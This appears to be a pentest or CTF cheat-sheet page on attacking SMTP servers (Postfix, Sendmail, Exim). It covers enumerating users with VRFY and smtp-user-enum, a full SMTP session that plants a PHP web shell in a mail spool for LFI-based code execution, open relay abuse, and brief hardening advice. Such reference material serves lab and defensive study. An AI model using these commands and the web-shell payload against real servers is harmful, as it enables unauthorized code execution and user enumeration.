Postfix / SMTP
aka SMTP, Sendmail, Exim
Mail transfer agent on 25/465/587. VRFY/RCPT enumerate valid users, and a writable mail spool plus an LFI is a classic mail-poisoning path to RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
25 | tcp | SMTP |
465 | tcp | SMTPS |
587 | tcp | submission |
Fingerprint
- 220 banner naming Postfix/Sendmail/Exim
- EHLO lists VRFY, EXPN, AUTH support
Key files
| Path | Holds | Sensitive |
|---|---|---|
/var/mail/<user> | user mail spool, an LFI include/poisoning target | |
/var/spool/mail/<user> | alternate spool location | |
/etc/postfix/main.cf | MTA config (relay, networks) | |
/etc/postfix/sasl_passwd | relay credentials when configured | sensitive |
/etc/aliases | mail aliases, can map to programs |
Service users
postfix
Exploitation primitives
- VRFY / EXPN / RCPT TO user enumeration (smtp-user-enum)
- Mail poisoning: send PHP to a local user, then include /var/mail/<user> through an LFI for RCE
- Open relay abuse and phishing if relaying is misconfigured
Overview
SMTP services move mail on 25 (and 465/587). For an attacker they offer two things: username enumeration, and a writable mail spool that pairs with an LFI to reach code execution.
Enumeration
Grab the banner and EHLO:
nc <TARGET> 25Enumerate users with VRFY:
smtp-user-enum -M VRFY -U users.txt -t <TARGET> -p 25Mail poisoning to RCE
HELO x
mail from: attacker
rcpt to: <localuser>
data
<?php system($_GET['cmd']); ?>
.Then include /var/mail/<localuser> via an LFI to execute the PHP.
Hardening
Disable VRFY/EXPN, require auth, and never allow open relaying.
Seen on these machines 2
